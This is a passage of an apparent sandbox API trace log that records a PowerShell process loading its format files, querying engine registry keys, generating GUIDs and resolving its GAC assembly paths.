[3]=0xe3, [4]=0xd4, [5]=0xda, [6]=0xfc, [7]=0xd8))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7192211e, Data2=0x19dd, Data3=0x4df2, Data4=([0]=0xbf, [1]=0x8b, [2]=0x2f, [3]=0x2d, [4]=0x8d, [5]=0x67, [6]=0x6d, [7]=0xa2))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x6e5074ea, Data2=0xdb52, Data3=0x4a5d, Data4=([0]=0x80, [1]=0x3b, [2]=0x3f, [3]=0xce, [4]=0xc5, [5]=0x4f, [6]=0xa9, [7]=0x62))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x2480e767, Data2=0xb41, Data3=0x42e3, Data4=([0]=0xb2, [1]=0x6e, [2]=0xb4, [3]=0x57, [4]=0xbd, [5]=0xe7, [6]=0xcf, [7]=0xa4))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x1b12ca8b, Data2=0xa4f5, Data3=0x4637, Data4=([0]=0xb4, [1]=0x49, [2]=0x6a, [3]=0x79, [4]=0xf, [5]=0x80, [6]=0x6b, [7]=0x48))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xcacdc740, Data2=0xe512, Data3=0x4abd, Data4=([0]=0x97, [1]=0x4c, [2]=0x41, [3]=0xbf, [4]=0x21, [5]=0x14, [6]=0xd1, [7]=0x5c))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x31019848, Data2=0xd8a, Data3=0x4e9b, Data4=([0]=0x97, [1]=0xcb, [2]=0xc3, [3]=0x8a, [4]=0x84, [5]=0xc9, [6]=0xa1, [7]=0x5d))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xdf3b4349, Data2=0x412b, Data3=0x41a5, Data4=([0]=0xb7, [1]=0x45, [2]=0xbf, [3]=0xc3, [4]=0xf7, [5]=0x9c, [6]=0x71, [7]=0x19))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xc9afebd8, Data2=0x2f0c, Data3=0x4270, Data4=([0]=0xbf, [1]=0x9d, [2]=0x12, [3]=0xaf, [4]=0xfb, [5]=0xb0, [6]=0x11, [7]=0xfc))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xbaac3add, Data2=0xdf41, Data3=0x493e, Data4=([0]=0x86, [1]=0x11, [2]=0x6d, [3]=0x60, [4]=0xa2, [5]=0x16, [6]=0xb5, [7]=0x32))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xaa480fb0, Data2=0x8, Data3=0x4232, Data4=([0]=0x96, [1]=0x1f, [2]=0xcf, [3]=0x9b, [4]=0x87, [5]=0x56, [6]=0x76, [7]=0x7f))) returned 0x0 [0141.374] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa9adb892, Data2=0xe108, Data3=0x4b3e, Data4=([0]=0xb0, [1]=0x93, [2]=0x84, [3]=0xe5, [4]=0xba, [5]=0xab, [6]=0xa4, [7]=0xf4))) returned 0x0 [0141.375] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xbb511d33, Data2=0x3150, Data3=0x4973, Data4=([0]=0xb3, [1]=0x99, [2]=0x57, [3]=0x6c, [4]=0xb9, [5]=0x73, [6]=0x77, [7]=0x1a))) returned 0x0 [0141.375] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xbaa30136, Data2=0xfa47, Data3=0x471e, Data4=([0]=0xb4, [1]=0x83, [2]=0x1c, [3]=0x80, [4]=0xc3, [5]=0x83, [6]=0x5c, [7]=0xcd))) returned 0x0 [0141.375] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x93a0166d, Data2=0x7c64, Data3=0x4594, Data4=([0]=0x95, [1]=0xe3, [2]=0x5b, [3]=0x10, [4]=0xee, [5]=0x46, [6]=0xc3, [7]=0xbf))) returned 0x0 [0141.375] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa7a94f7a, Data2=0x1e74, Data3=0x4c86, Data4=([0]=0xa7, [1]=0x9d, [2]=0xfd, [3]=0xbc, [4]=0xb7, [5]=0xf3, [6]=0x79, [7]=0x53))) returned 0x0 [0141.375] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x313fc101, Data2=0x9465, Data3=0x4d55, Data4=([0]=0xa7, [1]=0xf4, [2]=0x5f, [3]=0xde, [4]=0x6d, [5]=0x40, [6]=0xd2, [7]=0x21))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5e965844, Data2=0x586d, Data3=0x4ec3, Data4=([0]=0xb8, [1]=0xf6, [2]=0x23, [3]=0x6c, [4]=0x6f, [5]=0xd0, [6]=0x3c, [7]=0x48))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8b1449b3, Data2=0x6084, Data3=0x49ed, Data4=([0]=0xb6, [1]=0xd9, [2]=0x2c, [3]=0x8, [4]=0xe1, [5]=0xca, [6]=0xb, [7]=0x5d))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xbbed902c, Data2=0x40b9, Data3=0x4708, Data4=([0]=0x86, [1]=0x92, [2]=0x4e, [3]=0xec, [4]=0xeb, [5]=0xcb, [6]=0x67, [7]=0xfd))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5d29300b, Data2=0xa5e9, Data3=0x4eed, Data4=([0]=0xb6, [1]=0xe0, [2]=0xe7, [3]=0x5e, [4]=0xcc, [5]=0xa1, [6]=0xe9, [7]=0x25))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe71d4182, Data2=0x897d, Data3=0x439d, Data4=([0]=0x8d, [1]=0x9f, [2]=0x44, [3]=0x27, [4]=0x50, [5]=0x24, [6]=0x2f, [7]=0xaa))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5d48fb54, Data2=0xc2ad, Data3=0x4185, Data4=([0]=0xbb, [1]=0xeb, [2]=0xa, [3]=0x30, [4]=0x5b, [5]=0x87, [6]=0x7f, [7]=0x40))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x3f799eb3, Data2=0xf25, Data3=0x4f00, Data4=([0]=0xa2, [1]=0xc9, [2]=0x13, [3]=0xe, [4]=0xe9, [5]=0x9e, [6]=0x45, [7]=0xf1))) returned 0x0 [0141.376] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x71f6c56a, Data2=0x866c, Data3=0x46f1, Data4=([0]=0x93, [1]=0xad, [2]=0x78, [3]=0xc6, [4]=0xfa, [5]=0xb1, [6]=0xb8, [7]=0xd5))) returned 0x0 [0141.377] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5d1d18ef, Data2=0xea98, Data3=0x4254, Data4=([0]=0xb3, [1]=0x12, [2]=0x9d, [3]=0x8, [4]=0xd0, [5]=0x70, [6]=0x70, [7]=0x92))) returned 0x0 [0141.377] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xc7e67a8a, Data2=0xa2a4, Data3=0x4113, Data4=([0]=0x8f, [1]=0x65, [2]=0xc9, [3]=0x46, [4]=0x6, [5]=0x5a, [6]=0xa7, [7]=0x5f))) returned 0x0 [0141.377] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x94b3a38e, Data2=0x6bdd, Data3=0x450b, Data4=([0]=0xa8, [1]=0x19, [2]=0xde, [3]=0xcd, [4]=0x26, [5]=0x2a, [6]=0x6b, [7]=0x9d))) returned 0x0 [0141.377] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5f668ae5, Data2=0x26b9, Data3=0x4759, Data4=([0]=0x82, [1]=0x6a, [2]=0x60, [3]=0x3e, [4]=0x8e, [5]=0xfc, [6]=0x1d, [7]=0x93))) returned 0x0 [0141.379] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xf3ad8a6a, Data2=0x2646, Data3=0x45fa, Data4=([0]=0xbd, [1]=0x45, [2]=0x85, [3]=0x8a, [4]=0xe3, [5]=0x48, [6]=0xdd, [7]=0x65))) returned 0x0 [0141.379] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x36b7545b, Data2=0x58a7, Data3=0x405f, Data4=([0]=0x95, [1]=0xb4, [2]=0xad, [3]=0xca, [4]=0x17, [5]=0x4, [6]=0x6f, [7]=0xf5))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x19a2d84c, Data2=0xd35d, Data3=0x4748, Data4=([0]=0x88, [1]=0x31, [2]=0x55, [3]=0xcd, [4]=0x3b, [5]=0x60, [6]=0xc2, [7]=0xa9))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x3d0bf58d, Data2=0x32e7, Data3=0x47f0, Data4=([0]=0xbf, [1]=0x67, [2]=0xda, [3]=0x43, [4]=0x82, [5]=0x22, [6]=0x4c, [7]=0xf8))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x451bd655, Data2=0x4e65, Data3=0x4053, Data4=([0]=0xbb, [1]=0xac, [2]=0x9d, [3]=0xc7, [4]=0xec, [5]=0x8d, [6]=0x84, [7]=0x2c))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xd0fcac5d, Data2=0xde2e, Data3=0x4b0a, Data4=([0]=0xaa, [1]=0x86, [2]=0x7b, [3]=0x49, [4]=0x69, [5]=0x41, [6]=0x30, [7]=0xd4))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xd5b88526, Data2=0xaa10, Data3=0x419d, Data4=([0]=0xa4, [1]=0xc1, [2]=0xa5, [3]=0xe2, [4]=0x6f, [5]=0xf5, [6]=0xb1, [7]=0xf8))) returned 0x0 [0141.380] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x72205556, Data2=0x64e4, Data3=0x48e1, Data4=([0]=0xbe, [1]=0xe8, [2]=0xb8, [3]=0xe5, [4]=0xa4, [5]=0xb1, [6]=0xed, [7]=0x9))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x2c548a16, Data2=0x578f, Data3=0x47b2, Data4=([0]=0xa9, [1]=0xd9, [2]=0x1c, [3]=0x80, [4]=0xd7, [5]=0xdd, [6]=0xdb, [7]=0x8f))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x1c3ae709, Data2=0x9e9a, Data3=0x44ae, Data4=([0]=0x82, [1]=0x70, [2]=0x4d, [3]=0xe2, [4]=0x89, [5]=0x1c, [6]=0x5b, [7]=0x8a))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8b826ad4, Data2=0xf26b, Data3=0x4369, Data4=([0]=0xb8, [1]=0x6e, [2]=0xe0, [3]=0x1c, [4]=0x1c, [5]=0x75, [6]=0xd8, [7]=0x7f))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7b236115, Data2=0xfaf1, Data3=0x431f, Data4=([0]=0x80, [1]=0xd2, [2]=0xbe, [3]=0x37, [4]=0xf9, [5]=0x21, [6]=0xd2, [7]=0xbe))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7ce99301, Data2=0x6129, Data3=0x4fcf, Data4=([0]=0xb6, [1]=0xa6, [2]=0xba, [3]=0xa2, [4]=0x3e, [5]=0x72, [6]=0xd, [7]=0xf3))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x5bf041da, Data2=0xefe8, Data3=0x4e6f, Data4=([0]=0x8f, [1]=0xb7, [2]=0x4d, [3]=0x38, [4]=0xf3, [5]=0x90, [6]=0xa5, [7]=0x4b))) returned 0x0 [0141.381] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x799a5c39, Data2=0x5af8, Data3=0x4fc4, Data4=([0]=0x95, [1]=0x25, [2]=0xfd, [3]=0x21, [4]=0x1d, [5]=0x37, [6]=0x59, [7]=0xd6))) returned 0x0 [0141.382] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.382] GetLastError () returned 0x0 [0141.382] GetFileType (hFile=0x328) returned 0x1 [0141.382] SetErrorMode (uMode=0x1) returned 0x1 [0141.382] GetFileType (hFile=0x328) returned 0x1 [0141.382] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.438] GetLastError () returned 0x0 [0141.439] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.440] GetLastError () returned 0x0 [0141.440] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.440] GetLastError () returned 0x0 [0141.440] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.440] GetLastError () returned 0x0 [0141.440] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x8b4, lpOverlapped=0x0) returned 1 [0141.440] GetLastError () returned 0x0 [0141.441] ReadFile (in: hFile=0x328, lpBuffer=0x33cd49c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33cd49c*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.441] GetLastError () returned 0x0 [0141.441] ReadFile (in: hFile=0x328, lpBuffer=0x33ce048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x33ce048*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.441] GetLastError () returned 0x0 [0141.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.441] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.441] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.441] RegCloseKey (hKey=0x328) returned 0x0 [0141.442] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x79badbd8, Data2=0x3540, Data3=0x490c, Data4=([0]=0xb2, [1]=0xad, [2]=0x70, [3]=0x35, [4]=0xa4, [5]=0xf6, [6]=0xf1, [7]=0x47))) returned 0x0 [0141.442] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xd6ddc678, Data2=0x7b36, Data3=0x4e8c, Data4=([0]=0x91, [1]=0x69, [2]=0x51, [3]=0xf9, [4]=0xc1, [5]=0x7d, [6]=0x98, [7]=0x1e))) returned 0x0 [0141.442] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.442] GetLastError () returned 0x0 [0141.442] GetFileType (hFile=0x328) returned 0x1 [0141.442] SetErrorMode (uMode=0x1) returned 0x1 [0141.442] GetFileType (hFile=0x328) returned 0x1 [0141.443] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.501] GetLastError () returned 0x0 [0141.501] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.501] GetLastError () returned 0x0 [0141.501] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.501] GetLastError () returned 0x0 [0141.501] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.501] GetLastError () returned 0x0 [0141.502] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0xe98, lpOverlapped=0x0) returned 1 [0141.502] GetLastError () returned 0x0 [0141.502] ReadFile (in: hFile=0x328, lpBuffer=0x340458c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x340458c*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.502] GetLastError () returned 0x0 [0141.502] ReadFile (in: hFile=0x328, lpBuffer=0x3404f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3404f54*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.502] GetLastError () returned 0x0 [0141.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.502] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.502] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.502] RegCloseKey (hKey=0x328) returned 0x0 [0141.503] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x34c50040, Data2=0xb2bf, Data3=0x404f, Data4=([0]=0xba, [1]=0x7b, [2]=0x9a, [3]=0xc5, [4]=0x12, [5]=0xbd, [6]=0xb9, [7]=0x46))) returned 0x0 [0141.503] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8318049f, Data2=0xe9d3, Data3=0x40ae, Data4=([0]=0xa3, [1]=0x7b, [2]=0xdc, [3]=0xc0, [4]=0x19, [5]=0xdb, [6]=0x5d, [7]=0x5d))) returned 0x0 [0141.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0141.518] GetLastError () returned 0x57 [0141.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0141.518] GetLastError () returned 0x57 [0141.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0141.520] GetLastError () returned 0x57 [0141.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0141.521] GetLastError () returned 0x57 [0141.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.523] GetLastError () returned 0x57 [0141.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.523] GetLastError () returned 0x57 [0141.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0141.525] GetLastError () returned 0x57 [0141.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0141.525] GetLastError () returned 0x57 [0141.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0141.528] GetLastError () returned 0x57 [0141.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0141.528] GetLastError () returned 0x57 [0141.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0141.530] GetLastError () returned 0x57 [0141.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0141.531] GetLastError () returned 0x57 [0141.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.533] GetLastError () returned 0x57 [0141.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.533] GetLastError () returned 0x57 [0141.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, 